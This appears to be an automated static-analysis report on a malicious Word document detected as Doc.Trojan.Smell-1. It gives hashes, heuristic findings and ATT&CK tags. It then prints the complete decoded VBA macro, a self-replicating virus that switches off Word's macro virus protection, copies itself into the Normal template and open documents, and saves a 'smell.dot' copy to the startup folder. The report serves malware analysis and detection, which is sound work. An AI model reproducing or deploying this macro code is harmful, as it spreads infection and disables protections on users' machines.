Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dd543da46f78bd35…

MALICIOUS

Office (OLE)

36.5 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 20c0647eaa373c718b32855ea67394d2 SHA-1: 536d498cd746fd409dd3975dc7124873da2e5a98 SHA-256: dd543da46f78bd35c9cea48023060ff284214bdf55903d25f7d3299e08cea663
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, as indicated by multiple critical and high severity heuristic firings including ClamAV detections. The Document_Open macro is designed to execute automatically when the document is opened. It attempts to install a component named 'smell.dot' into the Normal template, suggesting a downloader or dropper functionality.

Heuristics 3

  • ClamAV: Doc.Trojan.Smell-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Smell-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3226 bytes
SHA-256: d34133957fb147ee9188c0d76885bd0431deaf5d54ea71ba28343997397cd54b
Detection
ClamAV: Doc.Trojan.Smell-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public WhoAmI As String
Public SmellDot As Boolean
Public NormInstalled As Boolean
Public DocInstalled As Boolean
Public NormReadOnly As Boolean
Public DocThere As Boolean

Private Sub Document_Open()
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Options.ConfirmConversions = 0
Call ID_Status
Call Install_Status
If WhoAmI = "document" Then Call DocCode
If WhoAmI = "normal" Then Call NormCode
If WhoAmI = "smell" Then Call SmellCode
End Sub

Function ID_Status()
On Error Resume Next

If MacroContainer = NormalTemplate Then
    WhoAmI = "normal"
    GoTo checkout
End If
If MacroContainer = ActiveDocument Then WhoAmI = "document"
If MacroContainer = "smell.dot" Then WhoAmI = "smell"
checkout:
End Function

Function Install_Status()
On Error Resume Next
If Dir(Application.StartupPath + "\smell.dot") = "smell.dot" Then SmellDot = True
    For i = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(i).Name = "Smell" Then DocInstalled = True
    Next i
    For i = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(i).Name = "Smell" Then NormInstalled = True
    Next i
If GetAttr(NormalTemplate.FullName) = vbArchive + vbReadOnly Or _
GetAttr(NormalTemplate.FullName) = vbReadOnly Then NormReadOnly = True
End Function

Function DocCode()
On Error Resume Next
If NormInstalled = False And NormReadOnly = False Then
    NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
End If
If SmellDot = False Then
    ActiveDocument.SaveAs FileName:=Application.StartupPath + "\smell.dot", _
    FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
End If
End Function

Function NormCode()
On Error Resume Next
Call Check_For_Doc
If DocInstalled = False And DocThere = True Then
   ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
End If
If SmellDot = False And DocThere = True Then
   ActiveDocument.SaveAs FileName:=Application.StartupPath + "\smell.dot", _
   FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
End If
End Function

Function Check_For_Doc()
On Error GoTo docek
If ActiveDocument.Name <> "" Then
    DocThere = True
End If
GoTo over
docek:
DocThere = False
over:
End Function

Function SmellCode()
On Error Resume Next
If NormInstalled = False And NormReadOnly = False Then
    NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
    NormalTemplate.Save
End If
If DocInstalled = False Then
    ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
End If
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.